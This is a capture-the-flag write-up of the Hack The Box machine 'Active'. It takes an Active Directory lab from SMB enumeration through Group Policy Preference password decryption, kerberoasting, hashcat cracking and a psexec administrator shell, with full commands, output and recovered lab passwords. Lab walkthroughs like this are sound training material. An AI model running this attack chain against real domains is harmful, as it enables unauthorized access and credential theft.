Active - [HTB]

Cover Image for Active - [HTB]
Marmeus
Marmeus

Introduction

Active is an easy windows machine from Hack The Box where the attacker will have to dig inside the available windows' shares in order to find a Group Policy Preference credential for a user account in the Active Directory. Finally, doing kerberoasting we are able to identify a service being run as Administrator where we can obtain its Administrator’s Kerberos 5 hash for a later password cracking, grating us an interactive shell.

Enumeration

As always, let's start finding all opened ports in the machine with nmap.

kali@kali:~/Documents/HTB/Active$ sudo nmap -sS -p- -n -T5 -oN AllPorts.txt 10.10.10.100
Warning: 10.10.10.100 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.100
Host is up (0.049s latency).
Not shown: 65491 closed ports
PORT      STATE    SERVICE
53/tcp    open     domain
88/tcp    open     kerberos-sec
135/tcp   open     msrpc
139/tcp   open     netbios-ssn
268/tcp   filtered td-replica
389/tcp   open     ldap
445/tcp   open     microsoft-ds
464/tcp   open     kpasswd5
593/tcp   open     http-rpc-epmap
636/tcp   open     ldapssl
[...]

# Nmap done at Sun Jul  4 17:18:50 2021 -- 1 IP address (1 host up) scanned in 88.19 seconds

Then, we continue with a deeper scan of every opened port, getting more information about each service.

kali@kali:~/Documents/HTB/Active$ sudo nmap -sC -sV -n -T5 -oN PortsDepth.txt -p 53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49169,49171,49182 10.10.10.100
Nmap scan report for 10.10.10.100
Host is up (0.098s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-07-04 21:48:03Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
[...]
Host script results:
|_clock-skew: 12m34s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-07-04T21:49:00
|_  start_date: 2021-07-04T17:54:09

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul  4 17:36:31 2021 -- 1 IP address (1 host up) scanned in 70.35 seconds

Enumerating the Windows shares with smbmap obtains that the share Replication is enumerable.

kali@kali:/media/sf_2_MisPostsBlog/HTB/Active$ smbmap -H 10.10.10.100
[+] IP: 10.10.10.100:445        Name: 10.10.10.100                                       
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        Replication                                             READ ONLY
        SYSVOL                                                  NO ACCESS       Logon server share 
        Users                                                   NO ACCESS
kali@kali:/media/sf_2_MisPostsBlog/HTB/Active$ smbclient //10.10.10.100/Replication -U "%"
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  active.htb                          D        0  Sat Jul 21 06:37:44 2018

                10459647 blocks of size 4096. 5728355 blocks available

Looking inside there is a file Groups.xml at \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\.

kali@kali:~/Documents/HTB/Active$ smbclient //10.10.10.100/Replication -U "%"
Try "help" to get a list of possible commands.
smb: \> cd \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> dir
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  Groups.xml                          A      533  Wed Jul 18 16:46:06 2018

                10459647 blocks of size 4096. 5721526 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml 
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (2.9 KiloBytes/sec) (average 2.9 KiloBytes/sec)
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> 

Exploitation

This file contains the username active.htb\SVC_TGS and its encrypted password.

kali@kali:~/Documents/HTB/Active$ cat Groups.xml 
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

In order to decrypt the password we need to execute the following command.

kali@kali:~/Documents/HTB/Active$ gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'
GPPstillStandingStrong2k18

Now, we have access to the Users share.

kali@kali:~/Documents/HTB/Active$ smbmap -H 10.10.10.100 -u SVC_TGS -p  GPPstillStandingStrong2k18 
[+] IP: 10.10.10.100:445        Name: active.htb                                        
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        Replication                                             READ ONLY
        SYSVOL                                                  READ ONLY       Logon server share 
        Users                                                   READ ONLY

Inside it we can obtain the user flag in the directory \SVC_TGS\Desktop\.

kali@kali:~/Documents/HTB/Active$ smbclient //10.10.10.100/Users -U "SVC_TGS%GPPstillStandingStrong2k18"
smb: \> cd SVC_TGS/Desktop/
smb: \SVC_TGS\Desktop\> dir
  .                                   D        0  Sat Jul 21 11:14:42 2018
  ..                                  D        0  Sat Jul 21 11:14:42 2018                  
  user.txt   

                10459647 blocks of size 4096. 5721270 blocks available
smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)

Privilege Escalation

Because we have some domain credentials we can try kerberoasting using the tool GetUserSPNs.py

kali@kali:~/Documents/HTB/Active$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request -save -outputfile GetUserSPNs.txt
Impacket v0.9.23.dev1+20210315.121412.a16198c3 - Copyright 2020 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2021-01-21 11:07:03.723783         

[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

However, we have an issue due to the time difference between our machine and the kerberos service. In order to fix this problem we only need to execute the following commands.

kali@kali:~/Documents/HTB/Active$ sudo apt install ntpdate -y
kali@kali:~/Documents/HTB/Active$ sudo ntpdate 10.10.10.100
 5 Jul 08:09:15 ntpdate[10305]: step time server 10.10.10.100 offset +754.495116 sec

Once fixed, we obtain the Administrator's TGS ticket in hashcat format.

kali@kali:~/Documents/HTB/Active$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request -save -outputfile GetUserSPNs.txt
Impacket v0.9.23.dev1+20210315.121412.a16198c3 - Copyright 2020 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2021-01-21 11:07:03.723783

kali@kali:~/Documents/HTB/Active$ GetUserSPNs.txt 
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$493a9db3c8618a0037b2e1bec356a0c8$87170780c60ed56f8428e0eaa90f79d305c5505b73c267ef6d60ecc1cc1e4cb9090e54de1843b967fe2ffdd2af63d4bd242bb6c809619a075d0c9f2de13a21986de58a5658483e5a604380b7af28a49477bba09ee3beeda12d8b4cf918b1c572bf81b677fbc2ed778008c00be9002c5c54a3a63c2ba2c81d3c860e6ff75df598f3ae46bcf9de0604411681cdf3189e4f414b8db4aac60edb2d43e4ed5c0faecdef69968d24aba8a6b3f1f8c7a7433fba6ef93de064a0532b745c20571cde467c48bc5396e3dbe28ff2f2c34c9346a6061bc12dad9e7b08f2a21a2e1250cb433a938f264e797f0a2fb19ee18e476907819d5f96b581fe45ca575937abc24410986b63590655a63a4d9c05a8f019510b59e8593e3c170a24afa83d619ab2ae87f8bf2bbac689f8e3b86eb352089c865993a2d9f1720bcb2e2bf784ce542b699e3bcbce2a422db530fe642799ca32d5544c1e15dfd8d7b43a8b621337ce366bfaa07e3a9d3bbbe8f8ca42b8a5bcf9c124c84bcb93e5e7206d89e9ba612b6e97ed3d77c54bebb6687141a837020b8f13dc3046221be988634fb2e113d1e759a578302afbc6b9255ae84a8f8052b879964d085afaf51ee57e45b620b342e98bfa0826aa2beeb0292d13a9ae62d58828310e81f8b77c81ea188b4028c201fa32fb87ad5cfff79ec48bbaaa142226fc8f01c60ef77a142f80bc63f3bc56f25f52a86a5b55256d39faec49ea4b60a699b2867412977a775bb435f6fddddbd94326304a3e01f8cb9681d5003d7cb43ecdb802aa52d1a72889930f910ab0855ff5a5dffd1b7f1b0cff95a66dea713cfedf70e0ca8d821f8c8560542b03ef92e668cacb078920c2d018a026c9413de713e2e2cc3629227552443a8c97866df981f8d55c94b644f78311ad4584d668e73ef6dc053a62820bbe69233c0011e092cef4c3fec96809582f16a1de60ab1474f9eaca53f56feb22dec2ce4043009c085734c01f6696906a60b4d8400d77c2fc98eadbca23ffe5657b0ad4b8c2709cc5863ca11683f6d0275ddfc5c29278d4dfed4f3df1fa7e0b050c4acd8aad42f695cb23231d0c3b7ea65345fc4f069c8088ade81b1a3d3fec870d17b3741db2a7a6a96466eb4ddad7357b58d2a85bec43b244d9c6c8343dadd84c00b1423079f60a8413f31303d745313ec0abae0fb571933fc17b5addcef9f85d13dd933b4abda77c7e0fe8ee9219b8bf4f9161e0a0f41ad0a52f80dcf112dfca4d64cb07217971

Using hashcat we can retrieve the Administrator's password.

kali@kali:~/Documents/HTB/Active$ hashcat -m 13100 -a 0 GetUserSPNs.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]                                      
=============================================================================================================================                                      
* Device #1: pthread-Intel(R) Core(TM) i5-10210U CPU @ 1.60GHz, 5844/5908 MB (2048 MB allocatable), 4MCU

Host memory required for this attack: 134 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507                         
* Keyspace..: 14344385

[....]:Ticketmaster1968

Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, TGS-REP
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Ad...217971
Time.Started.....: Mon Jul  5 08:12:39 2021 (14 secs)
Time.Estimated...: Mon Jul  5 08:12:53 2021 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   753.3 kH/s (7.93ms) @ Accel:64 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 10551296/14344385 (73.56%)
Rejected.........: 0/10551296 (0.00%)
Restore.Point....: 10534912/14344385 (73.44%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: Tioncurtis23 -> TUGGIE

Started: Mon Jul  5 08:12:22 2021
Stopped: Mon Jul  5 08:12:55 2021

Finally, in order to obtain a reverse shell as "Administrator" we need to execute psexec.

kali@kali:~/Documents/HTB/Active$ psexec.py "active.htb/administrator:Ticketmaster1968"@10.10.10.100
Impacket v0.9.23.dev1+20210315.121412.a16198c3 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file ZxHDWdnx.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service RlII on 10.10.10.100.....
[*] Starting service RlII.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>type root.txt
[CENSORED]